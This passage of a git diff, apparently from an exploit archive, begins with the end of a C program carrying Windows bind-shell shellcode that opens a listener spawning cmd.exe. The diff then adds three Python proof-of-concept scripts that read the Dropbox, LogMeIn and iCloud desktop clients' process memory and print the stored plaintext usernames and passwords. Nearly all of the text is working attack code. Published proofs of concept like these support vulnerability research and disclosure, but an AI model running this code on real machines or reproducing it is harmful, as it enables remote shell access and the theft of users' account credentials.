+  b3:	8d 1c 24             	lea    (%esp),%ebx
+  b6:	66 b9 02 02          	mov    $0x202,%cx
+  ba:	53                   	push   %ebx
+  bb:	51                   	push   %ecx
+  bc:	ff 56 08             	call   *0x8(%esi)
+  bf:	31 c9                	xor    %ecx,%ecx
+  c1:	51                   	push   %ecx
+  c2:	51                   	push   %ecx
+  c3:	51                   	push   %ecx
+  c4:	b1 06                	mov    $0x6,%cl
+  c6:	51                   	push   %ecx
+  c7:	83 e9 05             	sub    $0x5,%ecx
+  ca:	51                   	push   %ecx
+  cb:	41                   	inc    %ecx
+  cc:	51                   	push   %ecx
+  cd:	ff 56 0c             	call   *0xc(%esi)
+  d0:	89 c7                	mov    %eax,%edi
+  d2:	99                   	cltd   
+  d3:	b2 02                	mov    $0x2,%dl
+  d5:	52                   	push   %edx
+  d6:	4a                   	dec    %edx
+  d7:	52                   	push   %edx
+  d8:	8d 0c 24             	lea    (%esp),%ecx
+  db:	b2 04                	mov    $0x4,%dl
+  dd:	51                   	push   %ecx
+  de:	52                   	push   %edx
+  df:	66 ba ff ff          	mov    $0xffff,%dx
+  e3:	52                   	push   %edx
+  e4:	57                   	push   %edi
+  e5:	ff 56 1c             	call   *0x1c(%esi)
+  e8:	99                   	cltd   
+  e9:	52                   	push   %edx
+  ea:	52                   	push   %edx
+  eb:	52                   	push   %edx
+  ec:	52                   	push   %edx
+  ed:	c6 04 24 02          	movb   $0x2,(%esp)
+  f1:	66 c7 44 24 02 11 5c 	movw   $0x5c11,0x2(%esp)
+  f8:	8d 0c 24             	lea    (%esp),%ecx
+  fb:	b2 10                	mov    $0x10,%dl
+  fd:	52                   	push   %edx
+  fe:	51                   	push   %ecx
+  ff:	57                   	push   %edi
+ 100:	ff 56 10             	call   *0x10(%esi)
+ 103:	99                   	cltd   
+ 104:	42                   	inc    %edx
+ 105:	52                   	push   %edx
+ 106:	57                   	push   %edi
+ 107:	ff 56 14             	call   *0x14(%esi)
+ 10a:	99                   	cltd   
+ 10b:	52                   	push   %edx
+ 10c:	52                   	push   %edx
+ 10d:	52                   	push   %edx
+ 10e:	52                   	push   %edx
+ 10f:	b2 10                	mov    $0x10,%dl
+ 111:	8d 0c 24             	lea    (%esp),%ecx
+ 114:	52                   	push   %edx
+ 115:	8d 1c 24             	lea    (%esp),%ebx
+ 118:	53                   	push   %ebx
+ 119:	51                   	push   %ecx
+ 11a:	57                   	push   %edi
+ 11b:	ff 56 18             	call   *0x18(%esi)
+ 11e:	89 c7                	mov    %eax,%edi
+ 120:	99                   	cltd   
+ 121:	83 ec 10             	sub    $0x10,%esp
+ 124:	8d 1c 24             	lea    (%esp),%ebx
+ 127:	57                   	push   %edi
+ 128:	57                   	push   %edi
+ 129:	57                   	push   %edi
+ 12a:	52                   	push   %edx
+ 12b:	52                   	push   %edx
+ 12c:	b2 ff                	mov    $0xff,%dl
+ 12e:	42                   	inc    %edx
+ 12f:	52                   	push   %edx
+ 130:	99                   	cltd   
+ 131:	52                   	push   %edx
+ 132:	52                   	push   %edx
+ 133:	52                   	push   %edx
+ 134:	52                   	push   %edx
+ 135:	52                   	push   %edx
+ 136:	52                   	push   %edx
+ 137:	52                   	push   %edx
+ 138:	52                   	push   %edx
+ 139:	52                   	push   %edx
+ 13a:	52                   	push   %edx
+ 13b:	b2 44                	mov    $0x44,%dl
+ 13d:	52                   	push   %edx
+ 13e:	8d 0c 24             	lea    (%esp),%ecx
+ 141:	99                   	cltd   
+ 142:	68 65 78 65 41       	push   $0x41657865
+ 147:	88 54 24 03          	mov    %dl,0x3(%esp)
+ 14b:	68 63 6d 64 2e       	push   $0x2e646d63
+ 150:	8d 04 24             	lea    (%esp),%eax
+ 153:	53                   	push   %ebx
+ 154:	51                   	push   %ecx
+ 155:	52                   	push   %edx
+ 156:	52                   	push   %edx
+ 157:	52                   	push   %edx
+ 158:	42                   	inc    %edx
+ 159:	52                   	push   %edx
+ 15a:	99                   	cltd   
+ 15b:	52                   	push   %edx
+ 15c:	52                   	push   %edx
+ 15d:	50                   	push   %eax
+ 15e:	52                   	push   %edx
+ 15f:	ff 16                	call   *(%esi)
+ 161:	50                   	push   %eax
+ 162:	ff 56 04             	call   *0x4(%esi)
+*/
+
+
+#include<windows.h>
+#include<stdio.h>
+#include<shellapi.h>
+#include<stdlib.h>
+
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04";
+
+int main(int i,char *a[])
+{
+
+	int mode;
+
+
+
+	if(i==1)
+	mode=1;
+	else
+	mode=atoi(a[1]);
+
+switch(mode)
+{
+	case 1:
+	ShellExecute(NULL,NULL,a[0],"78",NULL,0);
+	break;
+
+	case 78:
+	(* (int(*)())shellcode )();
+	break;
+
+	default:
+	break;
+}
+
+
+return 0;
+}
diff --git a/platforms/windows/local/40341.txt b/platforms/windows/local/40341.txt
deleted file mode 100755
index 7ee6c15d2..000000000
--- a/platforms/windows/local/40341.txt
+++ /dev/null
@@ -1,242 +0,0 @@
-#####
-# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
-# Tested on Windows Windows Server 2012 R2 64bit, English
-# Vendor Homepage @ https://www.dropbox.com
-# Date 06/09/2016
-# Bug Discovery by:
-#
-# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
-# http://www.black-rose.ml
-#
-# Viktor Minin (https://www.linkedin.com/in/MininViktor)
-# https://1-33-7.com/
-#
-# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
-# http://korznikov.com/
-#
-#####
-# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
-# A potential attacker could reveal the supplied username and password in order to gain access to account.
-#####
-# Proof-Of-Concept Code:
-
-import time
-import urllib
-from winappdbg import Debug, Process
-
-username	= ''
-password	= ''
-found		= 0
-filename 	= "Dropbox.exe"
-process_pid = 0
-memory_dump	= []
-
-debug = Debug()
-try:
-	print "[~] Searching for pid by process name '%s'.." % (filename)
-	time.sleep(1)
-	debug.system.scan_processes()
-	for (process, process_name) in debug.system.find_processes_by_filename(filename):
-		process_pid = process.get_pid()
-	if process_pid is not 0:
-		print "[+] Found process with pid #%d" % (process_pid)
-		time.sleep(1)
-		print "[~] Trying to read memory for pid #%d" % (process_pid)
-		
-		process = Process(process_pid)
-		for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
-			memory_dump.append(process.read(address,100))
-		for i in range(len(memory_dump)):
-			email_addr 	= memory_dump[i].split('email=')[1]
-			tmp_passwd 	= memory_dump[i].split('password=')[1]
-			username	= email_addr.split('\x00')[0]
-			password	= tmp_passwd.split('&is_sso_link=')[0]
-			if username != '' and password !='':
-				found = 1
-				print "[+] Credentials found!\r\n----------------------------------------"
-				print "[+] Username: %s" % urllib.unquote_plus(username)
-				print "[+] Password: %s" % password
-		if found == 0:
-			print "[-] Credentials not found! Make sure the client is connected."
-	else:
-		print "[-] No process found with name '%s'." % (filename)
-	
-	debug.loop()
-finally:
-    debug.stop()
-
-
-	
-######################################################################
-
-#####
-# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
-# Tested on Windows Windows Server 2012 R2 64bit, English
-# Vendor Homepage @ https://secure.logmein.com/home/en
-# Date 06/09/2016
-# Bug Discovery by:
-#
-# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
-# http://korznikov.com/
-#
-# Viktor Minin (https://www.linkedin.com/in/MininViktor)
-# https://1-33-7.com/
-#
-# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
-# http://www.black-rose.ml
-#
-#####
-# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
-# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
-#####
-# Proof-Of-Concept Code:
-
-import time
-import urllib
-from winappdbg import Debug, Process
-
-username	= ''
-password	= ''
-found		= 0
-filename 	= "LMIIgnition.exe"
-process_pid = 0
-memory_dump	= []
-
-debug = Debug()
-try:
-	print "[~] Searching for pid by process name '%s'.." % (filename)
-	time.sleep(1)
-	debug.system.scan_processes()
-	for (process, process_name) in debug.system.find_processes_by_filename(filename):
-		process_pid = process.get_pid()
-	if process_pid is not 0:
-		print "[+] Found process with pid #%d" % (process_pid)
-		time.sleep(1)
-		print "[~] Trying to read memory for pid #%d" % (process_pid)
-		
-		process = Process(process_pid)
-		for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
-			memory_dump.append(process.read(address,150))
-		for i in range(len(memory_dump[0])):
-			email_addr 	= memory_dump[i].split('email=')[1]
-			tmp_passwd 	= memory_dump[i].split('password=')[1]
-			username	= email_addr.split('&hiddenEmail=')[0]
-			password	= tmp_passwd.split('&rememberMe=')[0]
-			if username != '' and password !='':
-				found = 1
-				print "[+] Credentials found!\r\n----------------------------------------"
-				print "[+] Username: %s" % urllib.unquote_plus(username)
-				print "[+] Password: %s" % password
-				break
-		if found == 0:
-			print "[-] Credentials not found! Make sure the client is connected."
-	else:
-		print "[-] No process found with name '%s'." % (filename)
-	
-	debug.loop()
-finally:
-    debug.stop()
-
-
-	
-######################################################################
-
-#####
-# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
-# Tested on Windows Windows 7 64bit, English
-# Vendor Homepage 	@ https://www.apple.com/
-# Product Homepage 	@ https://support.apple.com/en-us/HT204283
-# Date 07/09/2016
-# Bug Discovery by:
-#
-# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
-# http://www.black-rose.ml
-#
-# Viktor Minin (https://www.linkedin.com/in/MininViktor)
-# https://1-33-7.com/
-#
-# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
-# http://korznikov.com/
-#
-#####
-# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
-# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
-# Funny eh?!
-# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
-#
-# Authors are not responsible for any misuse or demage which caused by use of this script code.
-# Please use responsibly.
-#####
-# Proof-Of-Concept Code:
-
-import time
-import urllib
-from winappdbg import Debug, Process
-
-def b2h(str):
-    return ''.join(["%02X " % ord(x) for x in str]).strip()
-
-def h2b(str):
-	bytes = []
-	str = ''.join(str.split(" "))
-	for i in range(0, len(str), 2):
-		bytes.append(chr(int(str[i:i+2], 16)))
-	return ''.join(bytes)
-
-usr			= ''
-pwd			= ''
-found		= 0
-filename 	= "iCloud.exe"
-process_pid = 0
-memory_dump	= []
-
-debug = Debug()
-try:
-	print "#########################################################################"
-	print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
-	print "#   Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
-	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
-	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
-	print "#########################################################################\r\n"
-	print "[~] Searching for pid by process name '%s'.." % (filename)
-	time.sleep(1)
-	debug.system.scan_processes()
-	for (process, process_name) in debug.system.find_processes_by_filename(filename):
-		process_pid = process.get_pid()
-	if process_pid is not 0:
-		print "[+] Found process with pid #%d" % (process_pid)
-		time.sleep(1)
-		print "[~] Trying to read memory for pid #%d" % (process_pid)
-		
-		process = Process(process_pid)
-		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
-			memory_dump.append(process.read(address,50))
-		
-		try:
-			str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
-			usr = h2b(str.split(' 00')[0])
-		except:
-			pass
-			
-		memory_dump	= []
-		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
-			memory_dump.append(process.read(address,60))
-		try:
-			str = b2h(memory_dump[0]).split('07 00 02 09')[1]
-			pwd = h2b(str.split(' 00')[0])
-		except:
-			pass
-		
-		if usr != '' and pwd !='':
-			found = 1
-			print "[+] iCloud Credentials found!\r\n----------------------------------------"
-			print "[+] Username: %s" % usr
-			print "[+] Password: %s" % pwd
-		if found == 0:
-			print "[-] Credentials not found!"
-	else:
-		print "[-] No process found with name '%s'." % (filename)
-	
-	debug.loop()
-finally:
-    debug.stop()
diff --git a/platforms/windows/local/40348.py b/platforms/windows/local/40348.py
new file mode 100755
index 000000000..d5faf1120
--- /dev/null
+++ b/platforms/windows/local/40348.py
@@ -0,0 +1,66 @@
+#####
+# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
+# Tested on Windows Windows Server 2012 R2 64bit, English
+# Vendor Homepage @ https://www.dropbox.com
+# Date 06/09/2016
+# Bug Discovery by:
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
+# http://korznikov.com/
+#
+#####
+# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
+# A potential attacker could reveal the supplied username and password in order to gain access to account.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+username	= ''
+password	= ''
+found		= 0
+filename 	= "Dropbox.exe"
+process_pid = 0
+memory_dump	= []
+
+debug = Debug()
+try:
+	print "[~] Searching for pid by process name '%s'.." % (filename)
+	time.sleep(1)
+	debug.system.scan_processes()
+	for (process, process_name) in debug.system.find_processes_by_filename(filename):
+		process_pid = process.get_pid()
+	if process_pid is not 0:
+		print "[+] Found process with pid #%d" % (process_pid)
+		time.sleep(1)
+		print "[~] Trying to read memory for pid #%d" % (process_pid)
+		
+		process = Process(process_pid)
+		for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
+			memory_dump.append(process.read(address,100))
+		for i in range(len(memory_dump)):
+			email_addr 	= memory_dump[i].split('email=')[1]
+			tmp_passwd 	= memory_dump[i].split('password=')[1]
+			username	= email_addr.split('\x00')[0]
+			password	= tmp_passwd.split('&is_sso_link=')[0]
+			if username != '' and password !='':
+				found = 1
+				print "[+] Credentials found!\r\n----------------------------------------"
+				print "[+] Username: %s" % urllib.unquote_plus(username)
+				print "[+] Password: %s" % password
+		if found == 0:
+			print "[-] Credentials not found! Make sure the client is connected."
+	else:
+		print "[-] No process found with name '%s'." % (filename)
+	
+	debug.loop()
+finally:
+    debug.stop()
\ No newline at end of file
diff --git a/platforms/windows/local/40349.py b/platforms/windows/local/40349.py
new file mode 100755
index 000000000..c2f25fede
--- /dev/null
+++ b/platforms/windows/local/40349.py
@@ -0,0 +1,67 @@
+#####
+# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
+# Tested on Windows Windows Server 2012 R2 64bit, English
+# Vendor Homepage @ https://secure.logmein.com/home/en
+# Date 06/09/2016
+# Bug Discovery by:
+#
+# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
+# http://korznikov.com/
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+#####
+# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
+# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+username	= ''
+password	= ''
+found		= 0
+filename 	= "LMIIgnition.exe"
+process_pid = 0
+memory_dump	= []
+
+debug = Debug()
+try:
+	print "[~] Searching for pid by process name '%s'.." % (filename)
+	time.sleep(1)
+	debug.system.scan_processes()
+	for (process, process_name) in debug.system.find_processes_by_filename(filename):
+		process_pid = process.get_pid()
+	if process_pid is not 0:
+		print "[+] Found process with pid #%d" % (process_pid)
+		time.sleep(1)
+		print "[~] Trying to read memory for pid #%d" % (process_pid)
+		
+		process = Process(process_pid)
+		for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
+			memory_dump.append(process.read(address,150))
+		for i in range(len(memory_dump[0])):
+			email_addr 	= memory_dump[i].split('email=')[1]
+			tmp_passwd 	= memory_dump[i].split('password=')[1]
+			username	= email_addr.split('&hiddenEmail=')[0]
+			password	= tmp_passwd.split('&rememberMe=')[0]
+			if username != '' and password !='':
+				found = 1
+				print "[+] Credentials found!\r\n----------------------------------------"
+				print "[+] Username: %s" % urllib.unquote_plus(username)
+				print "[+] Password: %s" % password
+				break
+		if found == 0:
+			print "[-] Credentials not found! Make sure the client is connected."
+	else:
+		print "[-] No process found with name '%s'." % (filename)
+	
+	debug.loop()
+finally:
+    debug.stop()
\ No newline at end of file
diff --git a/platforms/windows/local/40350.py b/platforms/windows/local/40350.py
new file mode 100755
index 000000000..5a5f66fbe
--- /dev/null
+++ b/platforms/windows/local/40350.py
@@ -0,0 +1,99 @@
+#####
+# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
+# Tested on Windows Windows 7 64bit, English
+# Vendor Homepage 	@ https://www.apple.com/
+# Product Homepage 	@ https://support.apple.com/en-us/HT204283
+# Date 07/09/2016
+# Bug Discovery by:
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
+# http://korznikov.com/
+#
+#####
+# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
+# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
+# Funny eh?!
+# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
+#
+# Authors are not responsible for any misuse or demage which caused by use of this script code.
+# Please use responsibly.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+def b2h(str):
+    return ''.join(["%02X " % ord(x) for x in str]).strip()
+
+def h2b(str):
+	bytes = []
+	str = ''.join(str.split(" "))
+	for i in range(0, len(str), 2):
+		bytes.append(chr(int(str[i:i+2], 16)))
+	return ''.join(bytes)
+
+usr			= ''
+pwd			= ''
+found		= 0
+filename 	= "iCloud.exe"
+process_pid = 0
+memory_dump	= []
+
+debug = Debug()
+try:
+	print "#########################################################################"
+	print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
+	print "#   Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
+	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
+	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
+	print "#########################################################################\r\n"
+	print "[~] Searching for pid by process name '%s'.." % (filename)
+	time.sleep(1)
+	debug.system.scan_processes()
+	for (process, process_name) in debug.system.find_processes_by_filename(filename):
+		process_pid = process.get_pid()
+	if process_pid is not 0:
+		print "[+] Found process with pid #%d" % (process_pid)
+		time.sleep(1)
+		print "[~] Trying to read memory for pid #%d" % (process_pid)
+		
+		process = Process(process_pid)
+		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
+			memory_dump.append(process.read(address,50))
+		
+		try:
+			str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
+			usr = h2b(str.split(' 00')[0])
+		except:
+			pass
+			
+		memory_dump	= []
+		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
+			memory_dump.append(process.read(address,60))
+		try:
+			str = b2h(memory_dump[0]).split('07 00 02 09')[1]
+			pwd = h2b(str.split(' 00')[0])
+		except:
+			pass
+		
+		if usr != '' and pwd !='':
+			found = 1
+			print "[+] iCloud Credentials found!\r\n----------------------------------------"
+			print "[+] Username: %s" % usr
+			print "[+] Password: %s" % pwd
+		if found == 0:
+			print "[-] Credentials not found!"
+	else:
+		print "[-] No process found with name '%s'." % (filename)
+	
+	debug.loop()
+finally:
+    debug.stop()
\ No newline at end of file